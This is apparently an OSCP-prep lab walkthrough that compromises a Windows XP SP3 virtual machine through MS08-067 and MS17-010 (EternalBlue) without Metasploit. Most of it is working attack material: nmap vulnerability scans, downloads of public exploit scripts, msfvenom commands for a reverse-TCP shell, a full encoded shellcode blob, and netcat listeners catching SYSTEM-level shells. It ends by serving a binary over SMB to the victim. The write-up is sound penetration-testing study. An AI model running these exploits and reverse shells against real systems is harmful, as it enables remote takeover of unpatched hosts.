For educational purposes only


I’ve been working through Georgia Weidman’s book “Penetration Testing: A Hands-On Guide to Hacking”. It’s a great and the only one book that’s relevant to prepare for the OSCP Exam. Unfortunately, when it comes to exploitation, Georgia relies on Metasploit’s meterpreter payload.

Metasploit Restrictions

For OSCP, you can only use Metasploit(Auxiliary, Exploit, and Post) on a single target. But you may use the following against all of the target machines:

  • multi handler (aka exploit/multi/handler)
  • msfvenom
  • pattern_create.rb
  • pattern_offset.rb

I guess this is the concept of Try Harder. Learn how to do things manually first. OSCP contains vulnerabilities like in the real world. VulnHub and HTB will definitely help, but that won’t be enough.

Enumeration

The target is a Windows XP(SP3) Machine:

root@kali:~# nmap -O 192.168.100.26 | egrep -i "^running|^os" | head -n -1
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
OS details: Microsoft Windows XP SP2 or SP3
root@kali:~# 

SMB/Netbios listen on TCP 139, 445 and UDP 137 by default. Instead of using msfconsole, i’ll run nmap smb scripts to check for vulnerabilities:

  • smb-vuln-ms08-067
  • smb-vuln-ms17-010
root@kali:~# nmap -p 139,445 --script=smb-vuln-ms08-067,smb-vuln-ms17-010 192.168.100.26
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-03 19:55 +04
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
ARP Ping Scan Timing: About 100.00% done; ETC: 19:55 (0:00:00 remaining)
Nmap scan report for 192.168.100.26
Host is up (0.00060s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:6D:FD:81 (VMware)

Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds

The target is Vulnerable to both ms08-067 and ms17-010. You want to read more about it, check out the links from the above output.

MS08-067 a.k.a Server Service Vulnerability

  • Summary: This vulnerability allows remote attackers to execute arbitrary code via a crafted RPC request.
  • Impact: An attacker who successfully exploited this vulnerability could take complete control of an affected system remotely.

The culprit is the NetprPathCanoicalize() function from the netapi32.dll module.

C:\>cd WINDOWS\system32

C:\WINDOWS\system32>dir | findstr "netapi"
08/23/2001  04:00 AM           108,464 netapi.dll
04/13/2008  09:42 PM           337,408 netapi32.dll

C:\WINDOWS\system32>

It’s a system process and it should be not stopped.

A crafted RPC request will trigger a stack-based buffer overflow, and since netapi32 is a system process, the shellcode will run from the NT Authority\SYSTEM account a.k.a System. It is the most powerful account on a Windows system. More powerful than any admin account!

Note: NT Authority is group which this account belongs to. You can’t login to this account with a password. Running command prompt as administrator will achieve this. By the end of this article you’ll learn how to do it remotely and manually.

Let’s take a look at this table:

| SID      	| Name         	| Purpose         	| Reference Name              	| Displayed Name  	|
|----------	|--------------	|-----------------	|-----------------------------	|-----------------	|
| S-1-5    	| NT Authority 	| Produce SIDs    	| NT-AUTHORITY                	| NT-AUTHORITY    	|
| S-1-5-18 	| Local System 	| Service Account 	| NT-AUTHORITY\SYSTEM         	| SYSTEM          	|
| S-1-5-19 	| NT Authority 	| Local Service   	| NT AUTHORITY\LocalService   	| LOCAL SERVICE   	|
| S-1-5-20 	| NT Authority 	| Network Service 	| NT AUTHORITY\NetworkService 	| NETWORK SERVICE 	|

SID stands for ‘Security Identifier’. It does not define a user account or group. It just defines a set of permissions. As you can see, those last 3 accounts contain the SID of NT Authority. But each with different purposes/permissions on the system. Even if you’re logged in as NT-AUTHORITY\SYSTEM, the command echo %username% won’t produce any output. Sometimes set u doesn’t work. To get past that, an executable called whoami can be uploaded(the method i prefer).

Exploitation

The exploit i’ll use can be found here. It’s a python script. Download it:

wget https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py

Payload/Shellcode Generation

root@kali:~/winxp/ms08-067# msfvenom -p windows/shell_reverse_tcp LHOST-192.168.100.30 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows

Explanation

  • -p windows/shell_reverse_tcp: A reverse shell will make the target connect back to my attacking machine.

  • LHOST=192.168.100.30 LPORT=443: My IP and Port on which i’ll be listening. Why Port 443? A firewall egree filtering process will prevent outgoing traffic from connecting to random ports. Or 4444 the default for metasploit. 443 looks like https traffic.

  • EXITFUNC=thread: Exit nicely

  • -b "\x00\x0a\x0d\x5c\x2f\x2e\x40": Bad characters not to use. It’s provided in the python script on line 49-51

  • -f py: Print shellcode in python format. I’ll use this to replace the default.

  • -a x86 and --platform windows: For windows 32-bit

Run it:

root@kali:~/winxp/ms08-067# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.100.30 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of py file: 1965 bytes
shellcode =  b""
shellcode += b"\xbe\xb3\x57\xbf\xcc\xda\xd6\xd9\x74\x24\xf4"
shellcode += b"\x5b\x29\xc9\xb1\x52\x31\x73\x12\x03\x73\x12"
shellcode += b"\x83\x58\xab\x5d\x39\x62\xbc\x20\xc2\x9a\x3d"
shellcode += b"\x45\x4a\x7f\x0c\x45\x28\xf4\x3f\x75\x3a\x58"
shellcode += b"\xcc\xfe\x6e\x48\x47\x72\xa7\x7f\xe0\x39\x91"
shellcode += b"\x4e\xf1\x12\xe1\xd1\x71\x69\x36\x31\x4b\xa2"
shellcode += b"\x4b\x30\x8c\xdf\xa6\x60\x45\xab\x15\x94\xe2"
shellcode += b"\xe1\xa5\x1f\xb8\xe4\xad\xfc\x09\x06\x9f\x53"
shellcode += b"\x01\x51\x3f\x52\xc6\xe9\x76\x4c\x0b\xd7\xc1"
shellcode += b"\xe7\xff\xa3\xd3\x21\xce\x4c\x7f\x0c\xfe\xbe"
shellcode += b"\x81\x49\x39\x21\xf4\xa3\x39\xdc\x0f\x70\x43"
shellcode += b"\x3a\x85\x62\xe3\xc9\x3d\x4e\x15\x1d\xdb\x05"
shellcode += b"\x19\xea\xaf\x41\x3e\xed\x7c\xfa\x3a\x66\x83"
shellcode += b"\x2c\xcb\x3c\xa0\xe8\x97\xe7\xc9\xa9\x7d\x49"
shellcode += b"\xf5\xa9\xdd\x36\x53\xa2\xf0\x23\xee\xe9\x9c"
shellcode += b"\x80\xc3\x11\x5d\x8f\x54\x62\x6f\x10\xcf\xec"
shellcode += b"\xc3\xd9\xc9\xeb\x24\xf0\xae\x63\xdb\xfb\xce"
shellcode += b"\xaa\x18\xaf\x9e\xc4\x89\xd0\x74\x14\x35\x05"
shellcode += b"\xda\x44\x99\xf6\x9b\x34\x59\xa7\x73\x5e\x56"
shellcode += b"\x98\x64\x61\xbc\xb1\x0f\x98\x57\x7e\x67\xc6"
shellcode += b"\xb9\x16\x7a\x06\xc7\x5d\xf3\xe0\xad\xb1\x52"
shellcode += b"\xbb\x59\x2b\xff\x37\xfb\xb4\xd5\x32\x3b\x3e"
shellcode += b"\xda\xc3\xf2\xb7\x97\xd7\x63\x38\xe2\x85\x22"
shellcode += b"\x47\xd8\xa1\xa9\xda\x87\x31\xa7\xc6\x1f\x66"
shellcode += b"\xe0\x39\x56\xe2\x1c\x63\xc0\x10\xdd\xf5\x2b"
shellcode += b"\x90\x3a\xc6\xb2\x19\xce\x72\x91\x09\x16\x7a"
shellcode += b"\x9d\x7d\xc6\x2d\x4b\x2b\xa0\x87\x3d\x85\x7a"
shellcode += b"\x7b\x94\x41\xfa\xb7\x27\x17\x03\x92\xd1\xf7"
shellcode += b"\xb2\x4b\xa4\x08\x7a\x1c\x20\x71\x66\xbc\xcf"
shellcode += b"\xa8\x22\xdc\x2d\x78\x5f\x75\xe8\xe9\xe2\x18"
shellcode += b"\x0b\xc4\x21\x25\x88\xec\xd9\xd2\x90\x85\xdc"
shellcode += b"\x9f\x16\x76\xad\xb0\xf2\x78\x02\xb0\xd6"

Note: Make a copy of the script in case it didn’t work. Then choose a different encoding.

Replace the default shellcode with generated output.

Run the ms08-067.py script with no argument. Look at the usage, and choose your target:

Usage: ms08-067.py <target ip> <os #> <Port #>

Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)

My target’s ID is 6(ID 7 also works). Use nc -nlvp 443 to listen for incoming connection, and launch the attack:

root@kali:~/winxp/ms08-067# python ms08-067.py 192.168.100.26 6 445
--snip--

#######################################################################

Windows XP SP3 English (NX)

[-]Initiating connection
[-]connected to ncacn_np:192.168.100.26[\pipe\browser]
Exploit finish

On my listener:

root@kali:~/winxp/ms08-067# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.100.30] from (UNKNOWN) [192.168.100.26] 1052
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

I’m logged in as Network Service

C:\WINDOWS\system32>set u
set u
USERPROFILE=C:\Documents and Settings\NetworkService

A weird behaviour i notice is that, if the Windows target is restarted, and you keep listening on the 443 Port, you’ll get a shell as LocalService:

root@kali:~/winxp/ms08-067# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.100.30] from (UNKNOWN) [192.168.100.26] 1028
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>set u
set u
USERPROFILE=C:\Documents and Settings\LocalService

C:\WINDOWS\system32>

In fact the shell session is running as NT AUTHORITY\SYSTEM(keep reading). Not as LocalService or NetworkService.

MS17-010 a.k.a EternalBlue

  • Summary: Allow remote code execution through an Integer Overflow on Server Message Block 1.0 (SMBv1) server. Named Pipe exploitation is optional.
  • Impact: Take control of the system with an Administrator Session.

Exploitation

The exploit can be found here. Again this one is also written in Python. Clone the repo:

git clone https://github.com/helviojunior/MS17-010

It contains multiple exploits regarding the same vulnerability for different Windows Version.

Note: Eternalblue requires only access to IPC$ to exploit a target while other exploits require access to named pipe too. So the exploit always works against Windows < 8 in all configuration (if tcp port 445 is accessible). However, Eternalblue has a chance to crash a target higher than other exploits.

Shellcode Generation

root@kali:~/winxp/ms17-010# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.100.30 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows >> ms11-010.exe
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

This exploit will use the browser name pipe to penetrate the system.

I’ll use the send_and_execute.py script to send the executable on the WinXP machine. Run your listener on port 443:

root@kali:~/winxp/ms17-010# python send_and_execute.py 192.168.100.26 ms11-010.exe 
Trying to connect to 192.168.100.26:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x8207fda8
SESSION: 0xe11fe9d8
FLINK: 0x5bd48
InData: 0x5ae28
MID: 0xa
TRANS1: 0x58b50
TRANS2: 0x5ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe1318918
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe13189b8
overwriting token UserAndGroups
Sending file 6V0XRA.exe...
Opening SVCManager on 192.168.100.26.....
Creating service iNGa.....
Starting service iNGa.....
The NETBIOS connection with the remote host timed out.
Removing service iNGa.....
ServiceExec Error on: 192.168.100.26
nca_s_proto_error
Done

It worked:

root@kali:~/winxp/ms08-067# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.100.30] from (UNKNOWN) [192.168.100.26] 1056
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

whoami.exe

The whoami.exe will display the current domain and user. The whoami.exe will be shared over SMB. Install python3-impacket:

apt-get install python3-impacket

The syntax: impacket-smbserver [sharename] [path_to_share].

I moved the executable in a directory called whoami. Run:

root@kali:~/winxp/ms17-010# impacket-smbserver KAVISH whoami/
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

To make it simple, you can just run: impacket-smbserver ATTACKER $(pwd)

On the target:

C:\WINDOWS\system32>\\192.168.100.30\KAVISH\whoami.exe
\\192.168.100.30\KAVISH\whoami.exe
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>set u
set u
USERPROFILE=C:\Documents and Settings\LocalService

C:\WINDOWS\system32>

The environment variable says the account is LocalService, but in fact it’s NT AUTHORITY\SYSTEM.

Note: The whoami.exe is located in /usr/share/windows-resources/binaries/

To copy a file from an SMB server, use the copy:

C:\WINDOWS\system32>copy \\192.168.100.30\KAVISH\whoami.exe
copy \\192.168.100.30\KAVISH\whoami.exe
        1 file(s) copied.

C:\WINDOWS\system32>

Happy Exploit. Try Harder.